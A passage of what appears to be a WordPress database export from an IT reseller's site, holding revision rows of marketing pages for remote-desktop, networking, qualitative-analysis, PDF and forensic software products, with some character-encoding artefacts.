u-space-mb-1/4\">Remote Desktop Software That Actually Works</h4>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n\r\n</div>\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h4>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2018-12-14 09:06:54','2018-12-14 01:06:54','',1437,'https://bintara.com.my/blog/2018/12/14/1437-revision-v1/',0,'revision','',0),(2113,1,'2018-12-14 00:02:39','2018-12-13 16:02:39','<h3 style=\"text-align: left;\"><img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />ARUBA NETWORKING PRODUCTS</h3>\r\n<div class=\"subheadline\">\r\n<h3>Smarter solutions for experience-driven networking.</h3>\r\n<h3></h3>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n[maxbutton id=\"1\" ]','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2018-12-14 00:02:39','2018-12-13 16:02:39','',1440,'https://bintara.com.my/blog/2018/12/14/1440-revision-v1/',0,'revision','',0),(2115,1,'2018-12-14 00:04:48','2018-12-13 16:04:48','<h3>What is ATLAS.ti?</h3>\r\n<strong>ATLAS.ti is a powerful workbench for the qualitative analysis of large bodies of textual, graphical, audio and video data.</strong>\r\n\r\nSophisticated tools help you to arrange, reassemble, and manage your material in creative, yet systematic ways. ATLAS.ti keeps you focused on the material itself. Whether your field is anthropology, economics, criminology, or medicine: ATLAS.ti will meet your qualitative analysis needs!\r\n<h3 id=\"Huge-Variety-Of-Media-Types\">Huge Variety Of Media Types</h3>\r\nATLAS.ti offers anÂ <strong>unsurpassed range of media</strong>Â for you to work with: Whether itâ€™s coding hundreds of documents, audio clips or photos, ATLAS.ti will never let you down!\r\n\r\nWork withÂ <strong>text documents in all major formats</strong>â€“including txt,.doc, .docx, .odt, and, of course, .pdf. Perform fully automated searches across one or multiple documents, auto-coding, and other powerful semantic operations to extract meaning.\r\n\r\nEnjoy the freedom of working withÂ <strong>dozens of graphic and audio formats</strong>Â (.wav, ,mp3, .wma, etc.) as well as most common video types (.avi, .mp4, .wmv, etc.).\r\n\r\nYou canÂ <strong>import data from Evernote, Twitter,</strong>Â and your favorite Reference Manager for aÂ <strong>literature review</strong>Â . OrÂ <strong>import entire surveys</strong>Â to analyze answers to open-ended questions.\r\n<h3 id=\"Explore-Material-In-Great-Depth\">Explore Material In Great Depth</h3>\r\nGet to know your material in tremendous depth. Code systematically and develop aÂ <strong>system of meaning</strong>Â that unlocks your specific research subject.Â <strong>Explore</strong>Â your data with the Network Editor, the Text Search Tool, word clouds, word frequency tables, and through the various query options.\r\n\r\nThese tools will help you toÂ <strong>discover</strong>Â the intricate hidden â€œtextureâ€ of your data, its interwoven meanings.\r\n<h3 id=\"Powerful-Tool-set\">Powerful Tool set</h3>\r\nATLAS.ti offers a set of tools and features that are powerful and flexible enough to get to the bottom of even the most complex data material.\r\n\r\nYour central workspace in ATLAS.ti serves as a container for your projectâ€™s data. Access to all basic project components such as your documents, highlighted/coded data segments, codes, memos, hyperlinks, groups, or networks is fast and comfortable.\r\n\r\n<strong>Coding</strong>Â can be done by simply dragging codes onto the selected piece of data. Object Managers, the Project Explorer, and the Co-occurrence Explorer let you browse and navigate through your project data.\r\n\r\n<strong>Link</strong>Â your findings in aÂ <strong>semantically meaningful way</strong>.\r\n\r\n<strong>Visualize</strong>Â your findings and interpretations in a digital mind map as you go.\r\n<h3 id=\"Unique-Features\">Unique Features</h3>\r\nTheÂ <strong>interactive margin area</strong>Â is a unique work space in ATLAS.ti not surpassed by any other program on the market. It permits a uniquely intuitive way of interacting with your data, digitally transferring the traditional paper-and-pen analogy in the digital world.\r\n\r\nTheÂ <strong>quotation level</strong>Â is also radically unique to ATLAS.ti. If offers an analytic level below coding and better supports inductive, interpretive research approaches like grounded theory, hermeneutic, discourse analysis, sociology of knowledge, or phenomenology than any other software.\r\n\r\nThis can also be said about the ATLAS.tiÂ <strong>network / visualization</strong>Â function. It offers the most integrated way of working with your data, it is a tool for visualization as well as for analysis, for data organization as well as conceptual level analytic work and data presentation.\r\n\r\nBecause of the way ATLAS.ti manages data under the hood, it allows for handling muchÂ <strong>larger projects</strong>Â than other products: ATLAS.ti handle projects that contain thousands of documents and/or tens of thousands of coded data segments.\r\n<h3 id=\"Team-Work\">Team Work</h3>\r\nATLAS.ti supportsÂ <strong>collaborative work</strong>Â in several highly effective ways. Dedicated tools as well as some general principles of the software make collaborations a breeze.\r\n<h3 id=\"Long-Data-Lifespan\">Long Data Lifespan</h3>\r\nTo supportÂ <strong>multi-method multi-user projects across space and time (longitudinal studies)</strong>, project data export using XML is available. With XML, the proprietary nature of most software systems can be mitigated. This is indeed a mandatory need in scientific settings. ATLAS.tiâ€™s dedicated XML schema influenced the development of theÂ QuDEXÂ language for the purpose of archiving qualitative data.\r\n<h3 id=\"Great-User-Support\">Great User Support</h3>\r\nATLAS.ti comes withÂ <strong>unsurpassed service</strong>Â andÂ <strong>multiple sources of support</strong>. Get a first overview of the software during one of ourÂ free webinarÂ hold in different languages.\r\n<h4>Instructional material</h4>\r\nOurÂ Quick TourÂ and the many videos on ourÂ YouTube channelÂ will help you to quickly master the software.\r\n<h4>Support Center</h4>\r\nIf you have questions not covered, you can write to ourÂ Support CenterÂ twenty-four hours a day, or call ourÂ telephone supportÂ during office hours.\r\n\r\nOurÂ <strong>Support Center</strong>Â lets you conveniently contact our developers and our competent support staff via a state-of-the-art helpdesk system, guaranteeing swift turnaround and short response times.\r\n<h4>Shared Expertise</h4>\r\nFurther, peer-to-peer support is available through theÂ <strong>ATLAS.ti User Forum</strong>Â with thousands of members. TheÂ ATLAS.ti Research BlogÂ offers a range of articles written by ATLAS.ti users world-wide in a large variety of topics.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/guyThxVJj2w\" width=\"932\" height=\"524\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','ATLAS.ti','','inherit','closed','closed','','1443-revision-v1','','','2018-12-14 00:04:48','2018-12-13 16:04:48','',1443,'https://bintara.com.my/blog/2018/12/14/1443-revision-v1/',0,'revision','',0),(3202,1,'2019-09-18 16:17:40','2019-09-18 08:17:40','<h2>What is ATLAS.ti?</h2>\r\n<strong>ATLAS.ti is a powerful workbench for the qualitative analysis of large bodies of textual, graphical, audio and video data.</strong>\r\n\r\nSophisticated tools help you to arrange, reassemble, and manage your material in creative, yet systematic ways. ATLAS.ti keeps you focused on the material itself. Whether your field is anthropology, economics, criminology, or medicine: ATLAS.ti will meet your qualitative analysis needs!\r\n<h3 id=\"Huge-Variety-Of-Media-Types\">Huge Variety Of Media Types</h3>\r\nATLAS.ti offers anÂ <strong>unsurpassed range of media</strong>Â for you to work with: Whether itâ€™s coding hundreds of documents, audio clips or photos, ATLAS.ti will never let you down!\r\n\r\nWork withÂ <strong>text documents in all major formats</strong>â€“including txt,.doc, .docx, .odt, and, of course, .pdf. Perform fully automated searches across one or multiple documents, auto-coding, and other powerful semantic operations to extract meaning.\r\n\r\nEnjoy the freedom of working withÂ <strong>dozens of graphic and audio formats</strong>Â (.wav, ,mp3, .wma, etc.) as well as most common video types (.avi, .mp4, .wmv, etc.).\r\n\r\nYou canÂ <strong>import data from Evernote, Twitter,</strong>Â and your favorite Reference Manager for aÂ <strong>literature review</strong>Â . OrÂ <strong>import entire surveys</strong>Â to analyze answers to open-ended questions.\r\n<h3 id=\"Explore-Material-In-Great-Depth\">Explore Material In Great Depth</h3>\r\nGet to know your material in tremendous depth. Code systematically and develop aÂ <strong>system of meaning</strong>Â that unlocks your specific research subject.Â <strong>Explore</strong>Â your data with the Network Editor, the Text Search Tool, word clouds, word frequency tables, and through the various query options.\r\n\r\nThese tools will help you toÂ <strong>discover</strong>Â the intricate hidden â€œtextureâ€ of your data, its interwoven meanings.\r\n<h3 id=\"Powerful-Tool-set\">Powerful Tool set</h3>\r\nATLAS.ti offers a set of tools and features that are powerful and flexible enough to get to the bottom of even the most complex data material.\r\n\r\nYour central workspace in ATLAS.ti serves as a container for your projectâ€™s data. Access to all basic project components such as your documents, highlighted/coded data segments, codes, memos, hyperlinks, groups, or networks is fast and comfortable.\r\n\r\n<strong>Coding</strong>Â can be done by simply dragging codes onto the selected piece of data. Object Managers, the Project Explorer, and the Co-occurrence Explorer let you browse and navigate through your project data.\r\n\r\n<strong>Link</strong>Â your findings in aÂ <strong>semantically meaningful way</strong>.\r\n\r\n<strong>Visualize</strong>Â your findings and interpretations in a digital mind map as you go.\r\n<h3 id=\"Unique-Features\">Unique Features</h3>\r\nTheÂ <strong>interactive margin area</strong>Â is a unique work space in ATLAS.ti not surpassed by any other program on the market. It permits a uniquely intuitive way of interacting with your data, digitally transferring the traditional paper-and-pen analogy in the digital world.\r\n\r\nTheÂ <strong>quotation level</strong>Â is also radically unique to ATLAS.ti. If offers an analytic level below coding and better supports inductive, interpretive research approaches like grounded theory, hermeneutic, discourse analysis, sociology of knowledge, or phenomenology than any other software.\r\n\r\nThis can also be said about the ATLAS.tiÂ <strong>network / visualization</strong>Â function. It offers the most integrated way of working with your data, it is a tool for visualization as well as for analysis, for data organization as well as conceptual level analytic work and data presentation.\r\n\r\nBecause of the way ATLAS.ti manages data under the hood, it allows for handling muchÂ <strong>larger projects</strong>Â than other products: ATLAS.ti handle projects that contain thousands of documents and/or tens of thousands of coded data segments.\r\n<h3 id=\"Team-Work\">Team Work</h3>\r\nATLAS.ti supportsÂ <strong>collaborative work</strong>Â in several highly effective ways. Dedicated tools as well as some general principles of the software make collaborations a breeze.\r\n<h3 id=\"Long-Data-Lifespan\">Long Data Lifespan</h3>\r\nTo supportÂ <strong>multi-method multi-user projects across space and time (longitudinal studies)</strong>, project data export using XML is available. With XML, the proprietary nature of most software systems can be mitigated. This is indeed a mandatory need in scientific settings. ATLAS.tiâ€™s dedicated XML schema influenced the development of theÂ QuDEXÂ language for the purpose of archiving qualitative data.\r\n<h3 id=\"Great-User-Support\">Great User Support</h3>\r\nATLAS.ti comes withÂ <strong>unsurpassed service</strong>Â andÂ <strong>multiple sources of support</strong>. Get a first overview of the software during one of ourÂ free webinarÂ hold in different languages.\r\n<h4>Instructional material</h4>\r\nOurÂ Quick TourÂ and the many videos on ourÂ YouTube channelÂ will help you to quickly master the software.\r\n<h4>Support Center</h4>\r\nIf you have questions not covered, you can write to ourÂ Support CenterÂ twenty-four hours a day, or call ourÂ telephone supportÂ during office hours.\r\n\r\nOurÂ <strong>Support Center</strong>Â lets you conveniently contact our developers and our competent support staff via a state-of-the-art helpdesk system, guaranteeing swift turnaround and short response times.\r\n<h4>Shared Expertise</h4>\r\nFurther, peer-to-peer support is available through theÂ <strong>ATLAS.ti User Forum</strong>Â with thousands of members. TheÂ ATLAS.ti Research BlogÂ offers a range of articles written by ATLAS.ti users world-wide in a large variety of topics.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/guyThxVJj2w\" width=\"932\" height=\"524\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','ATLAS.ti','','inherit','closed','closed','','1443-revision-v1','','','2019-09-18 16:17:40','2019-09-18 08:17:40','',1443,'https://bintara.com.my/blog/2019/09/18/1443-revision-v1/',0,'revision','',0),(2116,1,'2018-12-14 00:08:09','2018-12-13 16:08:09','<h3>Cambium</h3>\r\n<h3 class=\"section-title h1\">Solutions for all your wireless needs</h3>\r\n<strong>Local Government</strong>\r\n\r\nConnect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.\r\n\r\n<strong>Higher Education</strong>\r\n\r\nClassrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.\r\n\r\n<strong>Regional Service Providers</strong>\r\n\r\nWireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.\r\n\r\n<strong>Oil and Gas</strong>\r\n\r\nWireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.\r\n\r\n<strong>Small Medium Business Retail</strong>\r\n\r\nConnectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.\r\n\r\n<strong>Managed Service Providers</strong>\r\n\r\ncnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.\r\n\r\n<strong>Federal Government</strong>\r\n\r\nOur field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.\r\n\r\n<strong>Retail</strong>\r\n\r\nConnectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience\r\n\r\n<strong>Smart Cities</strong>\r\n\r\nWireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.\r\n\r\n[maxbutton id=\"1\" ]','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2018-12-14 00:08:09','2018-12-13 16:08:09','',1451,'https://bintara.com.my/blog/2018/12/14/1451-revision-v1/',0,'revision','',0),(2117,1,'2018-12-14 00:10:05','2018-12-13 16:10:05','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.\r\n\r\nTogether with our certified FCC, CE, ISO9001 partnering vendors who have excellent long track record internationally, we continue to provide products that consistently meet the high standard in reliability.\r\n\r\nBroadbase incorporated in year 2006 and today we are achieving toward our mission in providing products that have provenÂ its reliability and our promptness services.\r\n<p style=\"text-align: center;\"><strong>OPTICAL FIBER ETHERNET MEDIA CONVERTERS</strong></p>\r\n\r\n<table width=\"736\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>10/100Base-TX - 100Base-FX Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MST</td>\r\n<td>10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S40</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S60</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S80</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S120</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (120KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MS20</td>\r\n<td>100Base-FX Multi Mode to Single Mode 2KM to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Gigabit Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S40</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S80</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SFP</td>\r\n<td>10/100/1000Base-T to SFP Slot</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1000MS20</td>\r\n<td>1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Chassis for Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-14S-1100SA</td>\r\n<td>14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-16S-110CT</td>\r\n<td>16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-17S-1100CT</td>\r\n<td>17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>POE+ Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Industrial Media Converters (DIN Rail, Dual Input Power 12-48V)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-IDG</td>\r\n<td width=\"617\">1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-IDG</td>\r\n<td>1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MLC-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SL20-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Broadbase','','inherit','closed','closed','','1943-revision-v1','','','2018-12-14 00:10:05','2018-12-13 16:10:05','',1943,'https://bintara.com.my/blog/2018/12/14/1943-revision-v1/',0,'revision','',0),(2230,1,'2018-12-17 09:37:42','2018-12-17 01:37:42','<h3>Work from Anywhere with Nitro Cloud</h3>\r\nWhether you need to merge PDFs online or access your files on the go, Nitro Cloud equips you with the tools to accomplish your goals anytime, anywhere.\r\n\r\n<img class=\"alignnone wp-image-2232 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/pdf-workflows-300x194.png\" alt=\"\" width=\"300\" height=\"194\" />\r\n<h3>Complete your most common PDF workflows online</h3>\r\nIn just a couple clicks, Nitro Cloud can generate an easily accessible link so knowledge workers can securely share files with clients or colleaguesâ€”without the need for email attachments.\r\n\r\n<img class=\"alignnone wp-image-2233 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/convert-files-300x220.png\" alt=\"\" width=\"300\" height=\"220\" />\r\n<h3>Convert Office files to and from PDF online</h3>\r\nWith the online PDF converter in Nitro Cloud, you can quickly convert PDFs to and from Word files, Excel spreadsheets, and PowerPoint presentations to more easily work with the file formats you use most.\r\n\r\n<img class=\"alignnone wp-image-2234 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/connect-documents-300x164.png\" alt=\"\" width=\"300\" height=\"164\" />\r\n<h3>Connect to your documents in the cloud</h3>\r\nNo need to worry about not being able to access your files while away from your primary computer. Nitro Cloud allows you to access and store documents from any web browser or mobile device thanks to integrations with your favorite document repositories, including Dropbox, Google Drive, OneDrive, SharePoint, Office 365, and Box.\r\n\r\n<img class=\"alignnone wp-image-2235 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/maximize-time-253x300.png\" alt=\"\" width=\"253\" height=\"300\" />\r\n<h3>Maximize your time</h3>\r\nWith around-the-clock access to your important files and most common document workflows, you can optimize your time and productivity while on the goâ€”from combining and sharing files with a client at their office, to reviewing a document while on vacation, to converting a PDF to Word so you can download and edit the document on your home computer.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Nitro','','inherit','closed','closed','','1553-autosave-v1','','','2018-12-17 09:37:42','2018-12-17 01:37:42','',1553,'https://bintara.com.my/blog/2018/12/17/1553-autosave-v1/',0,'revision','',0),(2125,1,'2018-12-14 10:07:45','2018-12-14 02:07:45','<img class=\"alignnone wp-image-2127 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live.jpg\" alt=\"\" width=\"294\" height=\"126\" />\r\n\r\n&nbsp;\r\n<h3><strong>QatorLive</strong> is live forensic solution to collect and analyze digital evidence on the spot.</h3>\r\n<h3><b>QatorLive</b><b> features</b></h3>\r\n<ul>\r\n 	<li>Collect evidence easily through rapid analysis of target system.</li>\r\n 	<li>Get necessary data through quick storage device scan.</li>\r\n 	<li>Collect various and vital data with ease.</li>\r\n 	<li>The program runs from USB device therefore itâ€™s convenient and easy-to-use.</li>\r\n 	<li>By using preset policies, itâ€™s possible to check the necessary data rapidly from a large number of scanned data.</li>\r\n 	<li>Software is built easily so that even non-experts wonâ€™t have problems using it</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2126 size-large\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live-1024x658.png\" alt=\"\" width=\"800\" height=\"514\" />\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Qator Live','','inherit','closed','closed','','1573-autosave-v1','','','2018-12-14 10:07:45','2018-12-14 02:07:45','',1573,'https://bintara.com.my/blog/2018/12/14/1573-autosave-v1/',0,'revision','',0),(2126,1,'2018-12-14 10:00:34','2018-12-14 02:00:34','','qator live','','inherit','closed','closed','','qator-live-2','','','2018-12-14 10:00:34','2018-12-14 02:00:34','',1573,'https://bintara.com.my/wp-content/uploads/2018/12/qator-live.png',0,'attachment','image/png',0),(2127,1,'2018-12-14 10:02:14','2018-12-14 02:02:14','','qator live','','inherit','closed','closed','','qator-live-3','','','2018-12-14 10:02:14','2018-12-14 02:02:14','',1573,'https://bintara.com.my/wp-content/uploads/2018/12/qator-live.jpg',0,'attachment','image/jpeg',0),(2128,1,'2018-12-14 10:02:35','2018-12-14 02:02:35','<img class=\"alignnone wp-image-2127 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live.jpg\" alt=\"\" width=\"294\" height=\"126\" />\r\n\r\n&nbsp;\r\n\r\n<strong>QatorLive</strong> is live forensic solution to collect and analyze digital evidence on the spot.\r\n<h3><b>QatorLive</b><b> features</b></h3>\r\nCollect evidence easily through rapid analysis of target system.\r\nGet necessary data through quick storage device scan.\r\nCollect various and vital data with ease.\r\nThe program runs from USB device therefore itâ€™s convenient and easy-to-use.\r\nBy using preset policies, itâ€™s possible to check the necessary data rapidly from a large number of scanned data.\r\nSoftware is built easily so that even non-experts wonâ€™t have problems using it\r\n\r\n<img class=\"alignnone wp-image-2126 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live-300x193.png\" alt=\"\" width=\"300\" height=\"193\" />\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Qator Live','','inherit','closed','closed','','1573-revision-v1','','','2018-12-14 10:02:35','2018-12-14 02:02:35','',1573,'https://bintara.com.my/blog/2018/12/14/1573-revision-v1/',0,'revision','',0),(2129,1,'2018-12-14 10:04:10','2018-12-14 02:04:10','<img class=\"alignnone wp-image-2127 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live.jpg\" alt=\"\" width=\"294\" height=\"126\" />\r\n\r\n&nbsp;\r\n\r\n<strong>QatorLive</strong> is live forensic solution to collect and analyze digital evidence on the spot.\r\n<h3><b>QatorLive</b><b> features</b></h3>\r\nCollect evidence easily through rapid analysis of target system.\r\nGet necessary data through quick storage device scan.\r\nCollect 